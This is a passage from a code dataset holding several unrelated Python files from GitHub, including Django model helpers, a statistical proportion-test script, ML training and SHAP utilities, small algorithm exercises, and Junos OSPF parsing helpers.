models.ForeignKey('users.User', on_delete=models.PROTECT, blank=True, null=True, related_name='+')\n lock_date = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n abstract = True\n\n def lock(self, date=None):\n if not self.is_locked:\n self.is_locked = True\n self.locked_by = get_current_user()\n self.lock_date = date or now()\n self.save(toggling_lock=True)\n\n def unlock(self):\n self.is_locked = False\n self.locked_by = None\n self.lock_date = None\n self.save(toggling_lock=True)\n\n\ndef DATE(**kwargs):\n return jmodels.jDateField(**kwargs)\n\n\ndef POSTAL_CODE(**kwargs):\n return models.CharField(\n **kwargs,\n max_length=10,\n validators=[RegexValidator(regex='^.{10}$', message='طول کد پستی باید 10 رقم باشد', code='nomatch')]\n )\n\n\ndef PHONE(**kwargs):\n return models.CharField(\n **kwargs,\n max_length=11,\n validators=[RegexValidator(regex='^.{11}$', message='طول شماره موبایل باید 11 رقم باشد', code='nomatch')]\n )\n\n\ndef EXPLANATION():\n return models.CharField(max_length=1000, blank=True, null=True, default=\"\")\n\n\ndef is_valid_melli_code(value):\n if not re.search(r'^\\d{10}$', value):\n is_valid = False\n else:\n check = int(value[9])\n s = sum([int(value[x]) * (10 - x) for x in range(9)]) % 11\n is_valid = (2 > s == check) or (s >= 2 and check + s == 11)\n\n if not is_valid:\n raise ValidationError(\"کد ملی وارد شده صحیح نیست\")\n\n\ndef MELLI_CODE(**kwargs):\n return models.CharField(\n **kwargs,\n max_length=10,\n validators=[is_valid_melli_code]\n )\n\n\ndef DECIMAL(**kwargs):\n return models.DecimalField(max_digits=24, decimal_places=6, default=kwargs.pop('default', 0), **kwargs)\n\n\ndef upload_to(instance, filename):\n app = instance._meta.app_label\n model = instance.__class__.__name__\n return \"{}/{}/{}-{}\".format(app, model, datetime.now().timestamp(), filename)\n\n\ndef manage_files(instance, data, file_fields):\n for file_field in file_fields:\n if data.get('delete_{}'.format(file_field), False):\n getattr(instance, file_field).delete()\n setattr(instance, file_field, None)\n","repo_name":"sorooshmorshedi/back","sub_path":"helpers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42583762738","text":"from scipy.stats import fisher_exact\nimport sys\nimport json\nimport pandas as pd\nimport os\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import r as R\nfrom rpy2.robjects.numpy2ri import numpy2rpy\nfrom rpy2.robjects.packages import importr\nfrom rpy2.robjects import FloatVector\nimport numpy as np\nimport csv\n\nbase = importr('base')\nepitools=importr('epitools')\n\nbrain_part=\"visp\"\ncluster_num=16\n\nregions=[\"A1C\",\"AMY\",\"CBC\",\"DFC\",\n \"HIP\",\"IPC\",\"ITC\",\"M1C\",\n \"MD\",\"MFC\",\"OFC\",\"S1C\",\n \"STC\",\"STR\",\"V1C\",\"VFC\"]\n\nwork_dir=os.path.join(brain_part,\"stage_region_wise\",\"stage_vs_adulthood\")\nall_jsons=os.listdir(work_dir)\n\njdict={}\nfor f in all_jsons:\n if f.endswith(\".json\"):\n fstr=f.split(\".\")[0]\n with open(os.path.join(work_dir,f),\"r\") as wr:\n jdict[fstr]=json.load(wr)\n\ncomparisons=[\"prenatal_adulthood\",\n \"early_childhood_adulthood\"]\n\ni=1\nfor cnum in range(0,cluster_num+1):\n region_d={}\n for r in regions:\n comp_d={}\n for comparison in comparisons:\n jd=\"proportion\"+\"_\"+r+\"_\"+comparison\n clus_details=jdict[jd][\"Cluster\"+str(cnum)]\n ce=np.array([clus_details[\"a\"],clus_details[\"b\"]])\n univ=np.array([clus_details[\"U\"],clus_details[\"U\"]])\n r_ce=numpy2rpy(ce)\n r_univ=numpy2rpy(univ)\n R.assign(\"ce\", r_ce)\n R.assign(\"univ\", r_univ)\n omat=FloatVector([clus_details[\"a\"],clus_details[\"b\"],clus_details[\"U\"],clus_details[\"U\"]])\n R('pmat <- prop.test(x=ce,n=univ,alternative=\"greater\",conf.level=0.95)$p.value')\n pval=float((str(R(\"pmat\")).split(\" \")[1]).strip(\"\\n\"))\n epiod=epitools.oddsratio(omat)\n odds=epiod[1][1]\n comp_d[comparison+\"_pval\"]=pval\n comp_d[comparison+\"_pval_adj\"]=float(pval)*float(2)*(float(cluster_num+1))\n comp_d[comparison+\"_odds_ratio\"]=odds\n region_d[r]=comp_d\n \n with open(os.path.join(work_dir,brain_part+\"_prop_summary\",brain_part+\"_proportion_cluster\"+str(cnum)+\".csv\"),\"w\") as wh:\n writer=csv.writer(wh)\n writer.writerow([\"Region\",comparisons[0]+\"_pval\",comparisons[0]+\"_pval_adj\",\n comparisons[0]+\"_odds_ratio\",\n comparisons[1]+\"_pval\",comparisons[1]+\"_pval_adj\",\n comparisons[1]+\"_odds_ratio\"])\n rl=[]\n for r in region_d:\n rl.append([r,region_d[r][comparisons[0]+\"_pval\"],\n region_d[r][comparisons[0]+\"_pval_adj\"],\n region_d[r][comparisons[0]+\"_odds_ratio\"],\n region_d[r][comparisons[1]+\"_pval\"],\n region_d[r][comparisons[1]+\"_pval_adj\"],\n region_d[r][comparisons[1]+\"_odds_ratio\"]])\n writer.writerows(rl)\n","repo_name":"asmariyaz23/single_cell_autism_study","sub_path":"region_proportion_summarize.py","file_name":"region_proportion_summarize.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4198111032","text":"import rclpy\nfrom rclpy.node import Node\nfrom std_msgs.msg import String\n\n\nclass SettingsPublisher(Node):\n\n def __init__(self) -> None:\n super().__init__('SettingsPublisher')\n self.publisher_ = self.create_publisher(String, 'freqRange_settings', 10)\n\n def publishSettings(self, settings):\n msg = String()\n msg.data = settings\n self.publisher_.publish(msg)\n self.get_logger().info(msg.data)\n\ndef main(args=None):\n right = False\n while right:\n rclpy.init(args=args)\n print(\"////// Settings change //////\" )\n start = str(input(\"Input starting frequancy (min freq 62) (in GHz): \"))\n stop = str(input(\"Input stopping frequancy (min freq 69) (in GHz): \"))\n if (start >= 62 and stop <= 69 and start < stop):\n right = True\n \n start_stop = \"[\" + start + \",\" + stop + \"]\"\n SettingsPub = SettingsPublisher()\n SettingsPub.publishSettings(start_stop)\n\n SettingsPub.destroy_node()\n rclpy.shutdown()\n return 0 \n\nif __name__ == '__main__':\n main()","repo_name":"ValtteriJH/Windows-10-sensor-intergration-to-linux","sub_path":"settings_pub/settings_pub/freqRange_settings.py","file_name":"freqRange_settings.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36672269666","text":"import os\r\nimport torchvision\r\nfrom torchvision import datasets, transforms\r\n\r\ndef save_mnist_by_class(dataset, save_dir):\r\n # 创建保存目录\r\n os.makedirs(save_dir, exist_ok=True)\r\n digit_dirs = [save_dir+'/'+str(i) for i in range(10)]\r\n for dir in digit_dirs:\r\n os.makedirs(dir, exist_ok=True)\r\n\r\n # 遍历数据集并保存到对应的类别目录\r\n for i, (image, label) in enumerate(dataset):\r\n digit = label\r\n save_path = os.path.join(digit_dirs[digit], f\"mnist_image_{i}.png\")\r\n torchvision.utils.save_image(image, save_path)\r\n\r\n# 加载MNIST数据集\r\ntransform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.1307,), (0.3081,))\r\n])\r\nmnist_dataset = datasets.MNIST('data', train=True, download=True, transform=transform)\r\n\r\n# 按类别保存MNIST数据集\r\nsave_mnist_by_class(mnist_dataset, 'mnist_by_class')","repo_name":"cheart10086/DL","sub_path":"class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1710786302","text":"import os\nimport glob\nimport logging\nimport sys\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom .file_io import *\n\n\ndef set_gpu_devices(devices):\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n os.environ['CUDA_VISIBLE_DEVICES'] = devices\n print(f'Setting GPU devices is done. '\n f'CUDA_VISIBLE_DEVICES: {os.environ[\"CUDA_VISIBLE_DEVICES\"]}, '\n f'device count: {torch.cuda.device_count()}')\n\n\ndef show_num_params(model):\n total_params = sum(p.numel() for p in model.parameters())\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'Model total params: {total_params:,} - trainable params: {trainable_params:,}')\n\n\ndef files_with_suffix(directory, suffix, pure=False):\n \"\"\"\n retrieving all files with the given suffix from a folder\n :param suffix: -\n :param directory: -\n :param pure: if set to True, only filenames are returned (as opposed to absolute paths)\n \"\"\"\n files = [os.path.abspath(path) for path in glob.glob(os.path.join(directory, '**', f'*{suffix}'), recursive=True)]\n if pure:\n files = [os.path.split(file)[-1] for file in files]\n return files\n\n\ndef get_logger():\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n handler = logging.StreamHandler(sys.stdout)\n fmt = \"[%(filename)s line %(lineno)d] %(message)s\" # also get the function name\n handler.setFormatter(logging.Formatter(fmt))\n root.addHandler(handler)\n return root\n\n\ndef waited_print(string):\n print(string)\n print('====== Waiting for input')\n input()\n\n\ndef parse_log_file(file, mode='general'):\n lines = read_file_to_list(file)\n lines = [line for line in lines if line.startswith('Epoch')] # remove initial lines\n\n acc_at1_list, acc_at1_avg_list = [], []\n acc_at5_list, acc_at5_avg_list = [], []\n loss_list, loss_avg_list = [], []\n\n if mode == 'epoch_select':\n lines_to_consider = []\n for epoch in range(200):\n epoch_lines = [line for line in lines if line.startswith(f'Epoch: [{epoch}]')]\n # print(f'Epoch {epoch} lines: {len(epoch_lines)}')\n if len(epoch_lines) > 0: # if there are any lines in the log file with that epoch\n lines_to_consider.append(epoch_lines[-1]) # last line for each epoch before saving checkpoint\n else:\n lines_to_consider = lines # general mode, consider all lines\n\n # waited_print('')\n\n for line in lines_to_consider:\n the_list = line.split('\\t')\n loss_part = the_list[3]\n loss, loss_avg = float(loss_part.split(' ')[1]), float(loss_part.split(' ')[2][1:-1])\n\n acc_at1_part = the_list[4]\n acc_at5_part = the_list[5]\n\n acc_at_1, acc_at1_avg = float(acc_at1_part[6:12].strip()), float(acc_at1_part[14:20].strip())\n acc_at_5, acc_at5_avg = float(acc_at5_part[6:12].strip()), float(acc_at5_part[14:20].strip())\n\n loss_list.append(loss)\n loss_avg_list.append(loss_avg)\n\n acc_at1_list.append(acc_at_1)\n acc_at1_avg_list.append(acc_at1_avg)\n acc_at5_list.append(acc_at_5)\n acc_at5_avg_list.append(acc_at5_avg)\n\n return {\n 'acc_at1_list': acc_at1_list,\n 'acc_at1_avg_list': acc_at1_avg_list,\n 'acc_at5_list': acc_at5_list,\n 'acc_at5_avg_list': acc_at5_avg_list,\n 'loss_list': loss_list,\n 'loss_avg_list': loss_avg_list\n }\n\n\ndef visualize_log_file(file, metrics, title, parse_mode, vis_mode):\n dicts = parse_log_file(file, parse_mode)\n\n if vis_mode == 'do_prints':\n acc_at1_avg_list = dicts['acc_at1_avg_list']\n max_acc_at_1_avg = max(acc_at1_avg_list)\n inds = [i for i, j in enumerate(acc_at1_avg_list) if j == max_acc_at_1_avg]\n print(f'max_acc_at_1_avg: {max_acc_at_1_avg}, inds: {inds}')\n\n else:\n plt.title(title)\n if 'loss' in metrics:\n plt.plot(dicts['loss_list'], label='loss')\n plt.plot(dicts['loss_avg_list'], label='loss_avg')\n\n if 'acc_at1' in metrics:\n plt.plot(dicts['acc_at1_list'], label='acc_at1')\n plt.plot(dicts['acc_at1_avg_list'], label='acc_at1_avg')\n\n if 'acc_at5' in metrics:\n plt.plot(dicts['acc_at5_list'], label='acc_at5')\n plt.plot(dicts['acc_at5_avg_list'], label='acc_at5_avg')\n\n plt.legend()\n plt.grid()\n plt.show()\n\n\n","repo_name":"MoeinSorkhei/MoCo","sub_path":"helper/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32749066062","text":"\"\"\"\npython3.6\n@author:ya-jin-wu\n@license: Apache Licence \n@file: permutations.py \n@time: 2020/07/26\n@contact: yajinwu@163.com\n@software: PyCharm \n\n「『「『「☃」』」』」 \n\"\"\"\nfrom typing import List\n\n'''\n全排列\n递归解法\n'''\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n if len(nums) <= 1: # 递归终止条件\n return [nums]\n res = []\n for idx, num in enumerate(nums):\n res_nums = nums[:idx] + nums[idx + 1:] # 确定剩余元素\n for j in self.permute(res_nums):\n res.append([num] + j)\n return res\n\nif __name__ == '__main__':\n solution = Solution()\n nums = [1, 2, 3]\n result = solution.permute(nums)\n print(result)\n","repo_name":"yajinwuzl/algorithm","sub_path":"Algorithm_DataStructure/algorithm012/Week_03/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23963684776","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nimport lightgbm as lgb\nimport shap\n\nclass SHAP_Calculation:\n\n def __init__(self, X, y, id_column=None, id_value=None):\n self.X = X\n self.y = y\n # Enter unique_key column if exists\n self.id_column = id_column\n self.id_value = id_value\n self.model_list = list()\n\n def training_model(self, cv_cnt, params, test_size=0.3, num_boost_round=10000, early_stopping_rounds=50):\n print(\"Model training\")\n self.cv_cnt = cv_cnt\n self.params = params\n # Creating models in Bootstrapping-cross-validation manner\n for loop_cnt in range(cv_cnt):\n # Splitting data into test/train randomly and repetitively\n X_train, X_test, y_train, y_test = train_test_split(\n self.X,\n self.y,\n test_size=test_size,\n random_state=loop_cnt\n )\n # test-data preparation\n X_train, X_valid, y_train, y_valid = train_test_split(\n X_train,\n y_train,\n test_size=test_size,\n random_state=loop_cnt\n )\n # training-data preparation\n d_train = lgb.Dataset(\n data=X_train,\n label=y_train\n )\n # valid-data preparation\n d_valid = lgb.Dataset(\n data=X_valid,\n label=y_valid\n )\n del X_train, y_train\n # training\n model =lgb.train(\n params=params,\n train_set=d_train,\n num_boost_round=num_boost_round,\n valid_sets=d_valid,\n early_stopping_rounds=early_stopping_rounds,\n verbose_eval=1000\n )\n # calculating test data au\n if params['objective'] == 'binary':\n # validation by test_data\n y_pred_test = model.predict(X_test, pred_contrib=False)\n fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred_test)\n auc = metrics.auc(fpr, tpr)\n print('test data auc: ', auc)\n del auc, fpr, tpr, thresholds, X_test, y_pred_test, d_train, d_valid\n # appending model into list\n self.model_list.append(model)\n del model\n\n def SHAP_Calculation(self, records_per_chunk=20000):\n print(\"SHAP calculation\")\n total_records = len(self.X)\n print(\"total records: \", total_records)\n chunk_num = total_records // records_per_chunk + 1\n # SHAP will be calculated for each model.\n for model_index, model in enumerate(self.model_list):\n print(\"model index: \", model_index)\n # To save RAM space, SHAP calculation and target-prediction are to be done in limited numbers of records at once.\n for i in range(chunk_num):\n print(\"chunk: \", i)\n index_lower_lim = records_per_chunk * i\n index_upper_lim = records_per_chunk * (i+1)\n X_chunk = self.X[index_lower_lim:index_upper_lim]\n print(\"records per chunk: \", len(X_chunk))\n # SHAP computation(for each chunk)\n shap_values = model.predict(X_chunk, pred_contrib=True)\n # target prediction(for each chunk)\n # Reshaped for merge\n prediction = model.predict(X_chunk, pred_contrib=False).reshape((-1, 1))\n del X_chunk\n # shap and target prediction will be merged into one array(for each chunk)\n shap_with_prediction = np.concatenate([shap_values, prediction],\n axis=1)\n del shap_values, prediction\n if i == 0:\n shap_per_model = shap_with_prediction\n else:\n shap_per_model = np.concatenate([shap_per_model, shap_with_prediction],\n axis=0)\n if len(self.model_list) > 1:\n # Axis will be added for subsequent calculation(averaging SHAPs over all models)\n shap_per_model = shap_per_model.reshape((1,\n shap_per_model.shape[0],\n shap_per_model.shape[1]))\n # To optimize the memory space, averaging will be done in sequential manner.\n # Calculations will occupy only 2 data arrays of memory space, making the proceduces scalable.\n if model_index == 0:\n shap_all = shap_per_model\n else:\n shap_all = np.concatenate(\n [shap_all*model_index, shap_per_model],\n axis=0)\n shap_all = shap_all.mean(axis=0) * 2 / (model_index+1)\n # ndarray will be reshaped after averaging except for the last step.\n if model_index != self.cv_cnt - 1:\n shap_all = shap_all.reshape((1,\n shap_all.shape[0],\n shap_all.shape[1]))\n\n # Convertion of SHAP to dataframe\n shap_column_list = self.X.columns.values + \"_shap\"\n shap_column_list = shap_column_list.tolist()\n shap_column_list.append(\"base_value\")\n shap_column_list.append(\"prediction\")\n df_shap_lgb = (\n pd.DataFrame(\n shap_all,\n columns=shap_column_list\n )\n )\n # Actual target values and unique key will be implemented.\n df_shap_lgb[\"target\"] = self.y\n if self.id_column != None:\n df_shap_lgb[self.id_column] = self.id_value\n\n return df_shap_lgb\n","repo_name":"NNihashi/SHAP-in-small-size-memory-machine","sub_path":"shap_app.py","file_name":"shap_app.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14307997122","text":"from class54.Stack import Stack\n\n\ndef solve(A,B,C):\n stack = Stack()\n stack.push(B)\n for a in C:\n if a == 0 and stack.size != -1:\n stack.pop()\n else:\n stack.push(a)\n return stack.top()\n\n\nA = 10\nB = 23\nC = [86, 63, 60, 0, 47, 0, 99, 9, 0, 0]\nA = 1\nB = 1\nC = [2]\nprint(solve(A,B,C))","repo_name":"SauravSinha76/scaler2","sub_path":"class54/ball_game.py","file_name":"ball_game.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72776091208","text":"from reader.reader import DataClass\nfrom printer.data_printer import data_printer\nfrom data_for_pandas.data_for_pandas import get_data_frame\nfrom statics.statics import StaticsClass\n\n\nif __name__ == '__main__':\n path = \"file_for_reading/\"\n file_name = path + \"data.dat\"\n\n reader = DataClass(file_name)\n reader.reader()\n data = reader.get_data_to_analyze()\n\n data_frame = get_data_frame(data)\n\n statics = StaticsClass(data_frame)\n\n pearson_matrix, spearman_matrix, kendall_matrix = statics.get_correlation_matrices()\n\n statics.heatmap_graphics()\n statics.scatter_matrix_graphics()\n","repo_name":"j25-delavega/statistic_analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37423540938","text":"import os\n\nfrom utills.evaluation import *\nfrom utills.utils import *\nfrom model.my_model import Model\n\nos.environ['CUBLAS_WORKSPACE_CONFIG'] = ':4096:8'\nseed = 1\nnp.random.seed(seed)\nrandom.seed(seed)\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.use_deterministic_algorithms(True)\n\ndata = open('dataset/NPR7317_processed/7317_r_p.txt', 'r')\nlinks = data.readlines()\nl = []\nfor link in links:\n link = link.strip()\n link = link.split(' ')\n link = [eval(ll) for ll in link]\n l.append(link)\nlinks = np.array(l)\n# train, test = split_train_test(links, 0.8)\n# np.save('dataset/NPR7317_processed/train73178',train)\n# np.save('dataset/NPR7317_processed/test73178',test)\ntrain, test = np.load('dataset/NPR7317_processed/train73178.npy'), np.load('dataset/NPR7317_processed/test73178.npy')\n# 生成训练图\nlink_src = train[:, 1]\nlink_dst = train[:, 0]\nhetero_graph = dgl.heterograph({\n ('protein', 'link', 'rna'): (link_src, link_dst),\n ('rna', 'link_by', 'protein'): (link_dst, link_src),\n})\nprint(hetero_graph)\n\n# 生成测试图\nt_link_src = test[:, 1]\nt_link_dst = test[:, 0]\nt_hetero_graph = dgl.heterograph({\n ('protein', 'link', 'rna'): (t_link_src, t_link_dst),\n ('rna', 'link_by', 'protein'): (t_link_dst, t_link_src),\n})\n\ntest_links = np.stack([t_link_src, t_link_dst], axis=1)\n\n# 节点特征\nrna_features1 = torch.load('dataset/NPR7317_processed/rna7317_feature.pkl')\nprotein_features1 = torch.load('dataset/NPR7317_processed/proteinRPI7317_feature.pkl')\nrna_features2 = torch.load('dataset/NPR7317_processed/RPIrna7317.emb')\nprotein_features2 = torch.load('dataset/NPR7317_processed/RPIprotein7317.emb')\nrna_features = torch.cat((rna_features1, torch.tensor(rna_features2)), dim=1)\nprotein_features = torch.cat((protein_features1, torch.tensor(protein_features2)), dim=1)\n# hetero_graph.nodes['rna'].data['feature'] = rna_features\nhetero_graph.nodes['rna'].data['feature'] = torch.tensor(rna_features2)\n# hetero_graph.nodes['protein'].data['feature'] = protein_features\nhetero_graph.nodes['protein'].data['feature'] = torch.tensor(protein_features2)\n\nk = 4\nepoches = 100\nlr = 2e-4\nweight_decay = 0\ndevice = 'cuda'\n\nmetapaths = [\n [[\"link\", \"link_by\"], [\"link\", \"link_by\", \"link\", \"link_by\"]],\n [[\"link_by\", \"link\"], [\"link_by\", \"link\", \"link_by\", \"link\"]]\n]\nmodel = Model([128, 128], 256, 256, 256, 4,2, 0.2, device, metapaths).to(device)\n# model = Model([128, 128], 256, 256, 256, 4,2, 0.2, device, metapaths).to(device)\nprotein_feats = hetero_graph.nodes['protein'].data['feature']\nrna_feats = hetero_graph.nodes['rna'].data['feature']\nnode_features = {'protein': protein_feats, 'rna': rna_feats}\nopt = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\nbest = 0.0\n\n# 需要保证测试集的负样本不在训练集的正样本和负样本中\nt_negative_graph = construct_negative_graph(t_hetero_graph, 3, ('protein', 'link', 'rna'))\nsrc_dst1 = t_negative_graph.edges(etype='link')\nprotein_id1 = src_dst1[0]\nrna_id1 = src_dst1[1]\nneg = torch.stack([protein_id1, rna_id1], dim=1).numpy()\nneg1 = torch.stack([rna_id1, protein_id1], dim=1).numpy()\nll = []\nfor index, i in enumerate(neg1):\n dd = (i == links)\n d = np.sum(dd, axis=1)\n if 2 in d:\n ll.append(index)\nneg = np.delete(neg, ll, axis=0)\nnegative_graph = construct_negative_graph(hetero_graph, k, ('protein', 'link', 'rna'))\nnum_neg_edges = negative_graph.num_edges(etype='link')\nsrc_dst_neg = negative_graph.edges(etype='link')\nprotein_id_neg = src_dst_neg[0]\nrna_id_neg = src_dst_neg[1]\nneg11 = torch.stack([protein_id_neg, rna_id_neg], dim=1).numpy()\nl_need_remove = []\nfor idx, n in enumerate(neg11):\n dd = (n == test_links)\n d = np.sum(dd, axis=1)\n if 2 in d:\n l_need_remove.append(idx)\nn_r = num_neg_edges // k - len(l_need_remove)\nnegative_graph.remove_edges(l_need_remove)\nnum_neg_edges2 = negative_graph.num_edges(etype='link')\nridx = np.random.choice(num_neg_edges2, n_r, replace=False)\nnegative_graph.remove_edges(ridx)\nsrc_dst_neg = negative_graph.edges(etype='link')\nprotein_id_neg = src_dst_neg[0]\nrna_id_neg = src_dst_neg[1]\nneg11 = torch.stack([protein_id_neg, rna_id_neg], dim=1).numpy()\nlll = []\nfor index, i in enumerate(neg):\n dd = (i == neg11)\n d = np.sum(dd, axis=1)\n if 2 in d:\n lll.append(index)\nneg_test = np.delete(neg, lll, axis=0)\ntest_samples = dict()\ntest_samples['pos_samples'] = np.concatenate((np.array(test[:, 1])[:, None], np.array(test[:, 0])[:, None]), axis=1)\ntest_samples['neg_samples'] = neg_test\n# new_g1 = metapath_reachable_graph(hetero_graph, [\"link\", \"link_by\"])\n# new_g2 = metapath_reachable_graph(hetero_graph, [\"link_by\", \"link\"])\n# torch.save(new_g1,'dataset/NPR7317_processed/g7317_0_0.pkl')\n# torch.save(new_g2,'dataset/NPR7317_processed/g7317_1_0.pkl')\n# g_list = [[torch.load('dataset/NPR7317_processed/g7317_0_0.pkl'),torch.load('dataset/NPR7317_processed/g7317_0_1.pkl')],[torch.load('dataset/NPR7317_processed/g7317_1_0.pkl'),torch.load('dataset/NPR7317_processed/g7317_1_1.pkl')]]\n# edge_l = [torch.load('dataset/NPR7317_processed/edge7317_0_1.pkl'),torch.load('dataset/NPR7317_processed/edge7317_1_1.pkl')]\n# torch.save(g_list,'g_list7317.pkl')\n# torch.save(edge_l,'edge_l7317.pkl')\ng_list = torch.load('dataset/NPR7317_processed/g_list7317.pkl')\nedge_l = torch.load('dataset/NPR7317_processed/edge_l7317.pkl')\nfor epoch in range(epoches):\n\n pos_score, neg_score, h = model(g_list, hetero_graph, negative_graph, node_features, ('protein', 'link', 'rna'),\n edge_l)\n loss = compute_loss(pos_score, neg_score)\n opt.zero_grad()\n loss.backward()\n opt.step()\n\n embs = dict()\n embs['protein'] = h['protein'].cpu().detach()\n embs['rna'] = h['rna'].cpu().detach()\n avg_auroc, std_auroc, avg_auprc, std_auprc, acc, avg_recall, avg_spe, avg_pre, avg_mcc = link_prediction(epoch+1,embs,\n test_samples,\n 'hadamard')\n\n if avg_mcc > best:\n best = avg_mcc\n torch.save(h['protein'], 'protein.emb')\n torch.save(h['rna'], 'rna.emb')\n print(\n \"### epoch: {}, loss: {}, Average(over trials) of NPI-HetGNN: AUROC: {:.4f}({:.4f}), AUPRC: {:.4f}({:.4f}), ACC: {:.4f},Recall: {:.4f}, Specifity: {:.4f},Precision: {:.4f},MCC: {:.4f}\".format(\n epoch + 1,\n loss.item(),\n avg_auroc,\n std_auroc,\n avg_auprc,\n std_auprc,\n acc,\n avg_recall,\n avg_spe,\n avg_pre,\n avg_mcc))\n","repo_name":"xiaoliu166370/NPI-HetGNN","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42327596641","text":"\"\"\"Common get info functions for OSPF\"\"\"\n\n# Python\nimport logging\nimport datetime\nimport re\n\n# Genie\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\nfrom genie.utils.timeout import Timeout\n\nlog = logging.getLogger(__name__)\n\n\ndef get_ospf_interface_and_area(device):\n \"\"\" Retrieve interface for ospf on junos device\n\n Args:\n device ('obj'): Device object\n\n Returns:\n interface and area value dictionary\n \"\"\"\n try:\n out = device.parse(\"show ospf interface brief\")\n except SchemaEmptyParserError as spe:\n raise SchemaEmptyParserError(\n \"Could not parse output for\"\n \" command 'show ospf interface brief'\") from spe\n\n key_val = {}\n\n try:\n interface_dict = out[\"instance\"][\"master\"][\"areas\"]\n for k, v in interface_dict.items():\n for interface in v[\"interfaces\"].keys():\n key_val.update({interface: k})\n except KeyError as ke:\n raise KeyError(\"Key issue with exception: {}\".format(str(ke))) from ke\n return key_val\n\ndef get_ospf_spf_scheduled_time(log):\n \"\"\"\n Get OSPF spf scheduled time in log 'Jun 12 03:32:19.068983 OSPF SPF scheduled for topology default in 8s' \n\n Args:\n log ('str'): log string\n\n Returns:\n date time ('str') \n \"\"\" \n # Jun 12 03:32:19.068983 OSPF SPF scheduled for topology default in 8s\n p_scheduled = ('(?P\\S+\\s+\\d+) (?P\\d+\\:\\d+\\:\\d+\\.\\d+) '\\\n 'OSPF SPF scheduled for topology default in (?P\\d+)s') \n m = re.match(p_scheduled, log)\n\n try:\n if m:\n group = m.groupdict()\n scheduled_time = group['scheduled_time']\n return scheduled_time\n except KeyError as e:\n raise KeyError(f\"Key issue with exception: {str(e)}\") from e\n \n \n\ndef get_ospf_spf_start_time(log):\n \"\"\"\n Get OSPF spf start time in log 'Jun 12 03:40:19.068983 Starting full SPF for topology default' \n\n Args:\n log ('str'): log string\n\n Returns:\n date time ('str') \n \"\"\"\n # Jun 12 03:40:19.068983 Starting full SPF for topology default\n p_start = (\n '(?P\\S+\\s+\\d+) (?P\\d+\\:\\d+\\:\\d+\\.\\d+) Starting full SPF for topology default'\n ) \n m = re.match(p_start, log)\n \n try:\n if m:\n group = m.groupdict()\n start_time = group['start_time']\n return start_time\n except KeyError as e:\n raise KeyError(f\"Key issue with exception: {str(e)}\") from e\n \n return None\n\ndef get_ospf_database_checksum(device, lsa_type=None):\n \"\"\" Get ospf data base checksum data in a list\n\n Args:\n device (obj): Device object\n lsa_type (str, optional): LSA type to check for. Defaults to None.\n\n Returns:\n list: List of checksums\n \"\"\"\n\n try:\n out = device.parse('show ospf database')\n except SchemaEmptyParserError:\n return list()\n \n ret_list = []\n\n # Example dict\n # {\n # 'ospf-database-information': {\n # 'ospf-database': [{\n # 'lsa-type': 'Router',\n # 'checksum': '0xa9b6',\n # }]\n # }\n # }\n\n for entry_ in out.q.get_values('ospf-database'):\n if lsa_type and entry_.get('lsa-type') != lsa_type:\n continue\n\n if entry_.get('checksum'):\n ret_list.append(entry_.get('checksum'))\n\n return ret_list\n\ndef get_ospf_router_id(device):\n \"\"\" Retrieve ospf router id\n\n Args:\n device (obj): Device object\n \"\"\"\n try:\n output = device.parse('show ospf overview')\n except SchemaEmptyParserError:\n return None\n \n try:\n return output.q.get_values('ospf-router-id', 0)\n except Exception as e:\n log.info(\"Error retrieving router ID: {e}\".format(e=e)) \n return None\n \ndef get_ospf_neighbors_instance_state_count(device, expected_neighbor_state='Full', max_time=60, check_interval=10):\n \"\"\" Get ospf neighbors instance state count\n\n Args:\n device (obj): Device object\n expected_neighbor_state (str): Expected neighbor state. Defaults to 'Full'. \n max_time (int, optional): Maximum timeout time. Defaults to 60 seconds.\n check_interval (int, optional): Check interval. Defaults to 10 seconds.\n \"\"\"\n try:\n out = device.parse('show ospf neighbor instance all')\n except SchemaEmptyParserError:\n return None\n\n state_count = out.q.contains_key_value('ospf-neighbor-state', \n expected_neighbor_state).count()\n\n return state_count\n\ndef get_ospf_neighbor_count(device, expected_state=None, output=None, max_time=60, check_interval=10):\n \"\"\" Get ospf neighbors count\n\n Args:\n device 